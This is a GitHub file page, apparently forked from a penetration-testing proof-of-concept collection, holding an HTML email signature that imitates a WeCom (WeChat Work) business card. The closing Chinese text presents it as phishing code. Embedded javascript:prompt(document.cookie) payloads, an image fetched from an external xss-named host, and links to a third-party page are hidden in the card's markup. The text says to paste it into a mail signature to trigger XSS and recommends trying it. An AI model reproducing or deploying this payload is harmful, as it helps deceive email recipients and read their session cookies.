forked from Mr-xn/Penetration_Testing_POC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
伪装成企业微信名片的钓鱼代码.txt
5 lines (4 loc) · 3 KB
/
伪装成企业微信名片的钓鱼代码.txt
1
2
3
4
5
<style class="fox_global_style"> div.fox_html_content { line-height: 1.5;} /* 一些默认样式 */ blockquote { margin-Top: 0px; margin-Bottom: 0px; margin-Left: 0.5em } ol, ul { margin-Top: 0px; margin-Bottom: 0px; list-style-position: inside; } p { margin-Top: 0px; margin-Bottom: 0px } </style><div style="background-image:url(javascript:prompt(document.cookie))"><a target="_blank" contenteditable="false" href="https://skyblueeternal.github.io/" class="weworkSignature_link" style="text-decoration: none;display: inline-block"> <table data-wwcard="true" cellspacing="0" cellpadding="0" style="margin: 12px; background-color:#fff;border-radius:4px;overflow:hidden;border: 1px solid #E6E6E6"> <tbody><tr> <td colspan="3" height="10" style="line-height: 1;"> <div style="width: 10px; height: 10px;"> </div> </td> </tr> <tr> <td width="12"> <div style="width: 12px; height: 12px;"> </div> </td> <td valign="top"> <table cellspacing="0" cellpadding="0"> <tbody><tr> <td valign="top" align="left"> <div style="font-size: 14px; font-weight: bold; color: #000; line-height: 1;min-width: 60px;max-width:250px; min-width: 130px; word-break: break-word; white-space: nowrap; overflow: hidden; text-overflow: ellipsis;">安全研究员</div> <div style="margin-top: 12px"> <div style="font-size: 12px; color: #353B42; margin-top: 6px; line-height: 1.3;max-width:250px;word-break: break-word; white-space: nowrap; overflow: hidden; text-overflow: ellipsis;">666</div> <div style="font-size: 12px; color: #353B42; margin-top: 6px; line-height: 1.3;max-width:250px;word-break: break-word; white-space: nowrap; overflow: hidden; text-overflow: ellipsis;">天融信</div> </div> </td> <td width="20"> <div style="width: 20px; height: 12px;"></div> </td> <td valign="top" align="right" style="text-align: right; font-size: 12px; color: #1F6CD7; line-height: 16px;"> <div style="width: 75px;"> <a target="_blank" href="https://skyblueeternal.github.io/" class="weworkSignature_link" style="display: inline-block; background: #f2f5f7; border-radius: 12px; padding: 3px 11px 2px; color: #1F6CD7;line-height: 1.5; text-decoration: none;"> <img srcset="https://xsshs.cn/ZDTD/xss.jpg, https://xsshs.cn/ZDTD/xss.jpg" width="11" height="11" style="width: 11px; height: 11px; vertical-align: -1px;"> 联系我 </a> </div> <div style="height: 1px; overflow:hidden;"><img src="https://skyblueeternal.github.io/"" style="width: 1px; height: 1px; background-image:url(javascript:prompt(document.cookie));"></div> </td> </tr> </tbody></table> </td> <td width="12"> <div style="width: 12px; height: 12px;"></div> </td> </tr> <tr> <td colspan="3" height="10" style="line-height: 1;"> <div style="width: 99999999999999px; height: 9999999999999px;"></div> </td> </tr> </tbody></table> </a></div>
分享一款,伪装成企业微信名片的钓鱼邮件代码。我将企业微信电子名片改成钓鱼网址,点之后进去第三方页面触发xss,伪装相似度很高。感兴趣建议一试。
以上的代码: 复制到 邮件签名 打XSS。
来自知识星球:起源实验室